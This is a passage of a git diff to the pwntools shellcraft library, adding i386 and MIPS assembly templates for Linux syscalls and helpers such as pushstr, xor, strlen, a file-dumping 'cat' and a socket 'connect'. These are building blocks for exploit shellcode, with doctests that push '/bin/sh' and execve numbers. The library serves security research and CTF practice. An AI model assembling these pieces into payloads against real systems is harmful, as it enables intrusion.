b/pwnlib/shellcraft/templates/i386/linux/vhangup.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vhangup. See 'man 2 vhangup' for more information. + +Arguments: + + + + ${syscall('SYS_vhangup')} diff --git a/pwnlib/shellcraft/templates/i386/linux/vmsplice.asm b/pwnlib/shellcraft/templates/i386/linux/vmsplice.asm new file mode 100644 index 000000000..3d2a1498d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/vmsplice.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fdout, iov, count, flags"/> +<%docstring> +Invokes the syscall vmsplice. See 'man 2 vmsplice' for more information. + +Arguments: + fdout(int): fdout + iov(iovec): iov + count(size_t): count + flags(unsigned): flags + + + ${syscall('SYS_vmsplice', fdout, iov, count, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/wait4.asm b/pwnlib/shellcraft/templates/i386/linux/wait4.asm new file mode 100644 index 000000000..9a0968d34 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/wait4.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid, stat_loc, options, usage"/> +<%docstring> +Invokes the syscall wait4. See 'man 2 wait4' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(WAIT_STATUS): stat_loc + options(int): options + usage(rusage): usage + + + ${syscall('SYS_wait4', pid, stat_loc, options, usage)} diff --git a/pwnlib/shellcraft/templates/i386/linux/waitid.asm b/pwnlib/shellcraft/templates/i386/linux/waitid.asm new file mode 100644 index 000000000..2235af949 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/waitid.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="idtype, id, infop, options"/> +<%docstring> +Invokes the syscall waitid. See 'man 2 waitid' for more information. + +Arguments: + idtype(idtype_t): idtype + id(id_t): id + infop(siginfo_t): infop + options(int): options + + + ${syscall('SYS_waitid', idtype, id, infop, options)} diff --git a/pwnlib/shellcraft/templates/i386/linux/waitpid.asm b/pwnlib/shellcraft/templates/i386/linux/waitpid.asm new file mode 100644 index 000000000..d7a7fbd5e --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/waitpid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid, stat_loc, options"/> +<%docstring> +Invokes the syscall waitpid. See 'man 2 waitpid' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(int): stat_loc + options(int): options + + + ${syscall('SYS_waitpid', pid, stat_loc, options)} diff --git a/pwnlib/shellcraft/templates/i386/linux/writev.asm b/pwnlib/shellcraft/templates/i386/linux/writev.asm new file mode 100644 index 000000000..1b785e57b --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/writev.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall writev. See 'man 2 writev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_writev', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/i386/memcpy.asm b/pwnlib/shellcraft/templates/i386/memcpy.asm new file mode 100644 index 000000000..92edd4f99 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/memcpy.asm @@ -0,0 +1,15 @@ +<% from pwnlib.shellcraft import i386, pretty %> +<%docstring>Copies memory. + +Args: + dest: Destination address + src: Source address + n: Number of bytes + +<%page args="dest, src, n"/> + + /* memcpy(${pretty(dest)}, ${pretty(src)}, ${pretty(n)}) */ + cld + ${i386.setregs({'edi': dest, 'esi': src, 'ecx': n})} + rep movsb + diff --git a/pwnlib/shellcraft/templates/i386/mov.asm b/pwnlib/shellcraft/templates/i386/mov.asm index 1990c21cb..685aa3026 100644 --- a/pwnlib/shellcraft/templates/i386/mov.asm +++ b/pwnlib/shellcraft/templates/i386/mov.asm @@ -1,6 +1,6 @@ <% + from pwnlib.shellcraft import eval, pretty, okay from pwnlib.util import lists, packing, fiddling, misc - from pwnlib.constants import eval, Constant from pwnlib.log import getLogger from pwnlib.shellcraft.registers import get_register, is_register, bits_required log = getLogger('pwnlib.shellcraft.i386.mov') @@ -20,6 +20,11 @@ If src is a string that is not a register, then it will locally set string. Note that this means that this shellcode can change behavior depending on the value of `context.os`. +Args: + dest (str): The destination register. + src (str): Either the input register, or an immediate value. + stack_allowed (bool): Can the stack be used? + Example: >>> print shellcraft.i386.mov('eax','ebx').rstrip() @@ -44,11 +49,11 @@ Example: >>> print shellcraft.i386.mov('ax', 'bl').rstrip() movzx ax, bl >>> print shellcraft.i386.mov('eax', 1).rstrip() - push 0x1 + push 1 pop eax >>> print shellcraft.i386.mov('eax', 1, stack_allowed=False).rstrip() xor eax, eax - mov al, 0x1 + mov al, 1 >>> print shellcraft.i386.mov('eax', 0xdead00ff).rstrip() mov eax, -0xdead00ff neg eax @@ -81,26 +86,10 @@ Example: push (SYS_execve) /* 0x3b */ pop eax >>> print shellcraft.i386.mov('eax', 'PROT_READ | PROT_WRITE | PROT_EXEC').rstrip() - push (PROT_READ | PROT_WRITE | PROT_EXEC) /* 0x7 */ + push (PROT_READ | PROT_WRITE | PROT_EXEC) /* 7 */ pop eax - -Args: - dest (str): The destination register. - src (str): Either the input register, or an immediate value. - stack_allowed (bool): Can the stack be used? <% -def okay(s): - return '\0' not in s and '\n' not in s - -def pretty(n): - if isinstance(n, Constant): - return '%s /* %#x */' % (n,n) - elif n < 0: - return str(n) - else: - return hex(n) - src_name = src if not isinstance(src, (str, tuple)): src_name = pretty(src) diff --git a/pwnlib/shellcraft/templates/i386/prolog.asm b/pwnlib/shellcraft/templates/i386/prolog.asm new file mode 100644 index 000000000..88c72e391 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/prolog.asm @@ -0,0 +1,6 @@ +<%docstring> +Function prologue. + + + push ebp + mov ebp, esp diff --git a/pwnlib/shellcraft/templates/i386/push.asm b/pwnlib/shellcraft/templates/i386/push.asm index 751edfdea..809072b97 100644 --- a/pwnlib/shellcraft/templates/i386/push.asm +++ b/pwnlib/shellcraft/templates/i386/push.asm @@ -21,23 +21,26 @@ Args: Example: >>> print pwnlib.shellcraft.i386.push(0).rstrip() - /* push 0 == 0x0 */ - push 0x1 + /* push 0 */ + push 1 dec byte ptr [esp] >>> print pwnlib.shellcraft.i386.push(1).rstrip() - /* push 1 == 0x1 */ - push 0x1 + /* push 1 */ + push 1 >>> print pwnlib.shellcraft.i386.push(256).rstrip() - /* push 256 == 0x100 */ + /* push 0x100 */ push 0x1010201 xor dword ptr [esp], 0x1010301 - >>> with context.local(os = 'linux'): - ... print pwnlib.shellcraft.i386.push('SYS_execve').rstrip() - /* push (SYS_execve) == 0xb */ + >>> print pwnlib.shellcraft.i386.push('SYS_execve').rstrip() + /* push (SYS_execve) (0xb) */ push 0xb + >>> print pwnlib.shellcraft.i386.push('SYS_sendfile').rstrip() + /* push (SYS_sendfile) (0xbb) */ + push 0x1010101 + xor dword ptr [esp], 0x10101ba >>> with context.local(os = 'freebsd'): ... print pwnlib.shellcraft.i386.push('SYS_execve').rstrip() - /* push (SYS_execve) == 0x3b */ + /* push (SYS_execve) (0x3b) */ push 0x3b diff --git a/pwnlib/shellcraft/templates/i386/pushstr.asm b/pwnlib/shellcraft/templates/i386/pushstr.asm index 701058c80..1cd48ed0f 100644 --- a/pwnlib/shellcraft/templates/i386/pushstr.asm +++ b/pwnlib/shellcraft/templates/i386/pushstr.asm @@ -1,5 +1,6 @@ <% from pwnlib.util import lists, packing, fiddling + from pwnlib.shellcraft import pretty, okay %> <%page args="string, append_null = True"/> <%docstring> @@ -10,7 +11,7 @@ Example: >>> print shellcraft.i386.pushstr('').rstrip() /* push '\x00' */ - push 0x1 + push 1 dec byte ptr [esp] >>> print shellcraft.i386.pushstr('a').rstrip() /* push 'a\x00' */ @@ -25,7 +26,7 @@ Example: xor dword ptr [esp], 0x1606060 >>> print shellcraft.i386.pushstr('aaaa').rstrip() /* push 'aaaa\x00' */ - push 0x1 + push 1 dec byte ptr [esp] push 0x61616161 >>> print shellcraft.i386.pushstr('aaaaa').rstrip() @@ -41,7 +42,7 @@ Example: xor dword ptr [esp], 0x10101c2 >>> print shellcraft.i386.pushstr('\xc3', append_null = False).rstrip() /* push '\xc3' */ - push 0x...c3 + push -0x3d >>> with context.local(): ... context.arch = 'i386' ... print enhex(asm(shellcraft.pushstr("/bin/sh"))) @@ -71,24 +72,12 @@ if append_null: if not string: return -def okay(s): - return '\n' not in s and '\0' not in s - if ord(string[-1]) >= 128: extend = '\xff' else: extend = '\x00' - -def orig_pretty(n): - if isinstance(n, int): - return '%s == %#x' % (n,n) - elif isinstance(n, str): - return repr(n) - -def pretty(n): - return hex(n & (2 ** 32 - 1)) %>\ - /* push ${orig_pretty(original)} */ + /* push ${pretty(original, False)} */ % for word in lists.group(4, string, 'fill', extend)[::-1]: <% sign = packing.u32(word, endian='little', sign='signed') diff --git a/pwnlib/shellcraft/templates/i386/pushstr_array.asm b/pwnlib/shellcraft/templates/i386/pushstr_array.asm new file mode 100644 index 000000000..a728878b0 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/pushstr_array.asm @@ -0,0 +1,38 @@ +<% from pwnlib.shellcraft import i386 %> +<%docstring> +Pushes an array/envp-style array of pointers onto the stack. + +Arguments: + reg(str): + Destination register to hold the pointer. + array(str,list): + Single argument or list of arguments to push. + NULL termination is normalized so that each argument + ends with exactly one NULL byte. + +<%page args="reg, array"/> +<% +if isinstance(array, (str)): + array = [array] + +array_str = '' + +# Normalize all of the arguments' endings +array = [arg.rstrip('\x00') + '\x00' for arg in array] +array_str = ''.join(array) + +word_size = 4 +offset = len(array_str) + word_size + +%>\ + /* push argument array ${repr(array)} */ + ${i386.pushstr(array_str)} + ${i386.mov(reg, 0)} + push ${reg} /* null terminate */ +% for i,arg in enumerate(reversed(array)): + ${i386.mov(reg, offset + word_size*i - len(arg))} + add ${reg}, esp + push ${reg} /* ${repr(arg)} */ + <% offset -= len(arg) %>\ +% endfor + ${i386.mov(reg,'esp')} diff --git a/pwnlib/shellcraft/templates/i386/setregs.asm b/pwnlib/shellcraft/templates/i386/setregs.asm index ef851d6c6..4428c5bee 100644 --- a/pwnlib/shellcraft/templates/i386/setregs.asm +++ b/pwnlib/shellcraft/templates/i386/setregs.asm @@ -15,12 +15,11 @@ Args: Example: - >>> R = shellcraft.registers.i386 - >>> print shellcraft.setregs({'eax':1, 'ebx':'eax'}, R).rstrip() + >>> print shellcraft.setregs({'eax':1, 'ebx':'eax'}).rstrip() mov ebx, eax - push 0x1 + push 1 pop eax - >>> print shellcraft.setregs({'eax':'ebx', 'ebx':'eax', 'ecx':'ebx'}, R).rstrip() + >>> print shellcraft.setregs({'eax':'ebx', 'ebx':'eax', 'ecx':'ebx'}).rstrip() mov ecx, ebx xchg eax, ebx diff --git a/pwnlib/shellcraft/templates/i386/stackarg.asm b/pwnlib/shellcraft/templates/i386/stackarg.asm new file mode 100644 index 000000000..cebe6f709 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/stackarg.asm @@ -0,0 +1,13 @@ +<%page args="index, register"/> +<%docstring> +Loads a stack-based argument into a register. + +Assumes that the 'prolog' code was used to save EBP. + +Arguments: + index(int): + Zero-based argument index. + register(str): + Register name. + + mov ${register}, [ebp+${4*(index+2)}] diff --git a/pwnlib/shellcraft/templates/i386/strcpy.asm b/pwnlib/shellcraft/templates/i386/strcpy.asm new file mode 100644 index 000000000..1fd097176 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/strcpy.asm @@ -0,0 +1,28 @@ +<% +from pwnlib.shellcraft import pretty, value, common, registers +from pwnlib.shellcraft.i386 import mov, pushstr, setregs, strlen +from pwnlib import constants +%> +<%docstring> +Copies a string + +Example: + + >>> sc = 'jmp get_str\n' + >>> sc += 'pop_str: pop eax\n' + >>> sc += shellcraft.i386.strcpy('esp', 'eax') + >>> sc += shellcraft.i386.linux.write(1, 'esp', 32) + >>> sc += shellcraft.i386.linux.exit(0) + >>> sc += 'get_str: call pop_str\n' + >>> sc += '.asciz "Hello, world\\n"' + >>> run_assembly(sc).recvline() + 'Hello, world\n' + +<%page args="dst, src"/> + ${setregs({'esi': src, + 'edi': dst})} + push edi + ${strlen('esi')} + pop edi + inc ecx + rep movs BYTE PTR [edi], BYTE PTR [esi] diff --git a/pwnlib/shellcraft/templates/i386/strlen.asm b/pwnlib/shellcraft/templates/i386/strlen.asm new file mode 100644 index 000000000..e838f4adf --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/strlen.asm @@ -0,0 +1,35 @@ +<% +from pwnlib.shellcraft import pretty, value, common, registers +from pwnlib.shellcraft.i386 import mov, pushstr, setregs +from pwnlib import constants +%> +<%docstring> +Calculate the length of the specified string. + +Arguments: + string(str): Register or address with the string + reg(str): Named register to return the value in, + ecx is the default. + +Example: + + >>> sc = 'jmp get_str\n' + >>> sc += 'pop_str: pop eax\n' + >>> sc += shellcraft.i386.strlen('eax') + >>> sc += 'push ecx;' + >>> sc += shellcraft.i386.linux.write(1, 'esp', 4) + >>> sc += shellcraft.i386.linux.exit(0) + >>> sc += 'get_str: call pop_str\n' + >>> sc += '.asciz "Hello, world\\n"' + >>> run_assembly(sc).unpack() == len('Hello, world\n') + True + +<%page args="string, reg='ecx'"/> + ${setregs({'ecx': -1, + 'edi': string, + 'eax': 0})} + repnz scas al, BYTE PTR [edi] + inc ecx + inc ecx + neg ecx + ${mov(reg, 'ecx')} diff --git a/pwnlib/shellcraft/templates/i386/xor.asm b/pwnlib/shellcraft/templates/i386/xor.asm new file mode 100644 index 000000000..01b716b83 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/xor.asm @@ -0,0 +1,82 @@ +<% + from pwnlib.shellcraft import pretty, common, i386, registers + from pwnlib.util.packing import pack, unpack + from pwnlib.context import context as ctx + from pwnlib.log import getLogger +%> +<%page args="key, address, count"/> +<%docstring> +XORs data a constant value. + +Args: + key (int,str): XOR key either as a 4-byte integer, + If a string, length must be a power of two, + and not longer than 4 bytes. + Alternately, may be a register. + address (int): Address of the data (e.g. 0xdead0000, 'esp') + count (int): Number of bytes to XOR, or a register containing + the number of bytes to XOR. + +Example: + + >>> sc = shellcraft.read(0, 'esp', 32) + >>> sc += 'mov ebx, [esp]\n' + >>> sc += 'mov edx, eax' + >>> sc += shellcraft.xor('ebx', 'esp', 'eax') + >>> sc += shellcraft.write(1, 'esp', 'edx') + >>> io = run_assembly(sc) + >>> io.send(cyclic(32)) + >>> io.recv() == xor(cyclic(context.bytes), cyclic(32)) + True + +<% +log = getLogger('pwnlib.shellcraft.templates.i386.xor') + +# By default, assume the key is a register +key_size = ctx.bytes +key_pretty = key + +key_register = registers.get_register(key) + +if key_register: + assert key_register.bytes == ctx.bytes +else: + key_str = key + key_int = key + + if isinstance(key, int): + key_str = pack(key, bytes=4) + else: + key_int = unpack(key, 'all') + + if len(key_str) > ctx.bytes: + log.error("Key %s is too large (max %i bytes)" % (pretty(key), ctx.bytes)) + + if len(key_str) not in (1,2,4): + log.error("Key length must be a power of two (got %s)" % pretty(key)) + + key_size = len(key_str) + key_pretty = pretty(key_int) + +if count == 0 or key_size == 0: + return '/* noop xor */' + +start = common.label('start') + +## Determine the move size +word_name = {1:'BYTE', 2:'WORD', 4:'DWORD', 8:'QWORD'}[key_size] + +## Set up the register context +regctx = {'eax': count, 'ecx': address} +if key_register and key_register.name in regctx: + regctx['ebx'] = key + key_pretty = 'ebx' +%> + /* xor(${pretty(key)}, ${pretty(address)}, ${pretty(count)}) */ + ${i386.setregs(regctx)} + add eax, ecx +${start}: + xor ${word_name} PTR [ecx], ${key_pretty} + add ecx, ${key_size} + cmp ecx, eax + jb ${start} diff --git a/pwnlib/shellcraft/templates/mips/linux/accept.asm b/pwnlib/shellcraft/templates/mips/linux/accept.asm new file mode 100644 index 000000000..328b230fc --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/accept.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, addr, addr_len"/> +<%docstring> +Invokes the syscall accept. See 'man 2 accept' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_accept', fd, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/mips/linux/access.asm b/pwnlib/shellcraft/templates/mips/linux/access.asm new file mode 100644 index 000000000..6c88167bb --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/access.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="name, type"/> +<%docstring> +Invokes the syscall access. See 'man 2 access' for more information. + +Arguments: + name(char): name + type(int): type + + + ${syscall('SYS_access', name, type)} diff --git a/pwnlib/shellcraft/templates/mips/linux/acct.asm b/pwnlib/shellcraft/templates/mips/linux/acct.asm new file mode 100644 index 000000000..0da285624 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/acct.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall acct. See 'man 2 acct' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_acct', name)} diff --git a/pwnlib/shellcraft/templates/mips/linux/alarm.asm b/pwnlib/shellcraft/templates/mips/linux/alarm.asm new file mode 100644 index 000000000..2bb7a45f8 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/alarm.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="seconds"/> +<%docstring> +Invokes the syscall alarm. See 'man 2 alarm' for more information. + +Arguments: + seconds(unsigned): seconds + + + ${syscall('SYS_alarm', seconds)} diff --git a/pwnlib/shellcraft/templates/mips/linux/bind.asm b/pwnlib/shellcraft/templates/mips/linux/bind.asm new file mode 100644 index 000000000..6cf11a759 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/bind.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall bind. See 'man 2 bind' for more information. + +Arguments: + fd(int): fd + addr(CONST_SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_bind', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/mips/linux/brk.asm b/pwnlib/shellcraft/templates/mips/linux/brk.asm new file mode 100644 index 000000000..a54676052 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/brk.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="addr"/> +<%docstring> +Invokes the syscall brk. See 'man 2 brk' for more information. + +Arguments: + addr(void): addr + + + ${syscall('SYS_brk', addr)} diff --git a/pwnlib/shellcraft/templates/mips/linux/cat.asm b/pwnlib/shellcraft/templates/mips/linux/cat.asm new file mode 100644 index 000000000..7a5bf80b2 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/cat.asm @@ -0,0 +1,24 @@ +<% + from pwnlib import constants + from pwnlib.shellcraft import mips + from pwnlib.shellcraft import common +%> +<%page args="filename, fd=1"/> +<%docstring> +Opens a file and writes its contents to the specified file descriptor. + +Example: + + >>> f = tempfile.mktemp() + >>> write(f, 'FLAG') + >>> run_assembly(shellcraft.mips.linux.cat(f)).recvall() + 'FLAG' + + +<% +label = common.label("sendfile_loop") +%> + + ${mips.pushstr(filename)} + ${mips.open('$sp', 0, int(constants.O_RDONLY))} + ${mips.sendfile(fd, '$v0', 0, 0x7fffffff)} diff --git a/pwnlib/shellcraft/templates/mips/linux/chdir.asm b/pwnlib/shellcraft/templates/mips/linux/chdir.asm new file mode 100644 index 000000000..58398837d --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/chdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chdir. See 'man 2 chdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chdir', path)} diff --git a/pwnlib/shellcraft/templates/mips/linux/chmod.asm b/pwnlib/shellcraft/templates/mips/linux/chmod.asm new file mode 100644 index 000000000..696a9dfa3 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/chmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall chmod. See 'man 2 chmod' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_chmod', file, mode)} diff --git a/pwnlib/shellcraft/templates/mips/linux/chown.asm b/pwnlib/shellcraft/templates/mips/linux/chown.asm new file mode 100644 index 000000000..5bb3330d3 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/chown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall chown. See 'man 2 chown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_chown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/mips/linux/chroot.asm b/pwnlib/shellcraft/templates/mips/linux/chroot.asm new file mode 100644 index 000000000..e9bce66eb --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/chroot.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chroot. See 'man 2 chroot' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chroot', path)} diff --git a/pwnlib/shellcraft/templates/mips/linux/clock_getres.asm b/pwnlib/shellcraft/templates/mips/linux/clock_getres.asm new file mode 100644 index 000000000..d20618a82 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/clock_getres.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="clock_id, res"/> +<%docstring> +Invokes the syscall clock_getres. See 'man 2 clock_getres' for more information. + +Arguments: + clock_id(clockid_t): clock_id + res(timespec): res + + + ${syscall('SYS_clock_getres', clock_id, res)} diff --git a/pwnlib/shellcraft/templates/mips/linux/clock_gettime.asm b/pwnlib/shellcraft/templates/mips/linux/clock_gettime.asm new file mode 100644 index 000000000..40abeef91 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/clock_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_gettime. See 'man 2 clock_gettime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_gettime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/mips/linux/clock_nanosleep.asm b/pwnlib/shellcraft/templates/mips/linux/clock_nanosleep.asm new file mode 100644 index 000000000..5e8219a34 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/clock_nanosleep.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="clock_id, flags, req, rem"/> +<%docstring> +Invokes the syscall clock_nanosleep. See 'man 2 clock_nanosleep' for more information. + +Arguments: + clock_id(clockid_t): clock_id + flags(int): flags + req(timespec): req + rem(timespec): rem + + + ${syscall('SYS_clock_nanosleep', clock_id, flags, req, rem)} diff --git a/pwnlib/shellcraft/templates/mips/linux/clock_settime.asm b/pwnlib/shellcraft/templates/mips/linux/clock_settime.asm new file mode 100644 index 000000000..a60b32f0a --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/clock_settime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_settime. See 'man 2 clock_settime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_settime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/mips/linux/clone.asm b/pwnlib/shellcraft/templates/mips/linux/clone.asm new file mode 100644 index 000000000..90ff240b6 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/clone.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fn, child_stack, flags, arg, vararg"/> +<%docstring> +Invokes the syscall clone. See 'man 2 clone' for more information. + +Arguments: + fn(int): fn + child_stack(void): child_stack + flags(int): flags + arg(void): arg + vararg(int): vararg + + + ${syscall('SYS_clone', fn, child_stack, flags, arg, vararg)} diff --git a/pwnlib/shellcraft/templates/mips/linux/close.asm b/pwnlib/shellcraft/templates/mips/linux/close.asm new file mode 100644 index 000000000..ae1d4dbf7 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/close.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall close. See 'man 2 close' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_close', fd)} diff --git a/pwnlib/shellcraft/templates/mips/linux/connect.asm b/pwnlib/shellcraft/templates/mips/linux/connect.asm new file mode 100644 index 000000000..e5288024c --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/connect.asm @@ -0,0 +1,26 @@ +<% + from pwnlib.shellcraft.mips import push, mov, pushstr + from pwnlib.shellcraft.mips.linux import syscall + from pwnlib.constants import SOCK_STREAM, SYS_socket, SYS_connect + from pwnlib.util.net import sockaddr +%> +<%page args="host, port, network='ipv4'"/> +<%docstring> + Connects to the host on the specified port. + Network is either 'ipv4' or 'ipv6'. + Leaves the connected socket in $s0. + +<% + sockaddr, addr_len, address_family = sockaddr(host, port, network) +%>\ +/* open new socket */ + ${syscall(SYS_socket, address_family, SOCK_STREAM, 0)} + +/* save opened socket */ + ${mov('$s0', '$v0')} + +/* push sockaddr, connect() */ + ${pushstr(sockaddr, False)} + ${syscall(SYS_connect, '$s0', '$sp', addr_len)} + +/* Socket that is maybe connected is in $s0 */ diff --git a/pwnlib/shellcraft/templates/mips/linux/creat.asm b/pwnlib/shellcraft/templates/mips/linux/creat.asm new file mode 100644 index 000000000..2d10f8e51 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/creat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall creat. See 'man 2 creat' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_creat', file, mode)} diff --git a/pwnlib/shellcraft/templates/mips/linux/dup.asm b/pwnlib/shellcraft/templates/mips/linux/dup.asm new file mode 100644 index 000000000..7f31830b5 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/dup.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall dup. See 'man 2 dup' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_dup', fd)} diff --git a/pwnlib/shellcraft/templates/mips/linux/dup2.asm b/pwnlib/shellcraft/templates/mips/linux/dup2.asm new file mode 100644 index 000000000..fd03c7fb2 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/dup2.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, fd2"/> +<%docstring> +Invokes the syscall dup2. See 'man 2 dup2' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + + + ${syscall('SYS_dup2', fd, fd2)} diff --git a/pwnlib/shellcraft/templates/mips/linux/dup3.asm b/pwnlib/shellcraft/templates/mips/linux/dup3.asm new file mode 100644 index 000000000..73f0f1728 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/dup3.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, fd2, flags"/> +<%docstring> +Invokes the syscall dup3. See 'man 2 dup3' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + flags(int): flags + + + ${syscall('SYS_dup3', fd, fd2, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/echo.asm b/pwnlib/shellcraft/templates/mips/linux/echo.asm new file mode 100644 index 000000000..dc10cb814 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/echo.asm @@ -0,0 +1,6 @@ +<% from pwnlib.shellcraft import mips %> +<%page args="string, sock = 1"/> +<%docstring>Writes a string to a file descriptor + +${mips.pushstr(string, append_null = False)} +${mips.linux.syscall('SYS_write', sock, '$sp', len(string))} diff --git a/pwnlib/shellcraft/templates/mips/linux/epoll_create.asm b/pwnlib/shellcraft/templates/mips/linux/epoll_create.asm new file mode 100644 index 000000000..9f515a336 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/epoll_create.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="size"/> +<%docstring> +Invokes the syscall epoll_create. See 'man 2 epoll_create' for more information. + +Arguments: + size(int): size + + + ${syscall('SYS_epoll_create', size)} diff --git a/pwnlib/shellcraft/templates/mips/linux/epoll_create1.asm b/pwnlib/shellcraft/templates/mips/linux/epoll_create1.asm new file mode 100644 index 000000000..4fb55efe4 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/epoll_create1.asm @@ -0,0 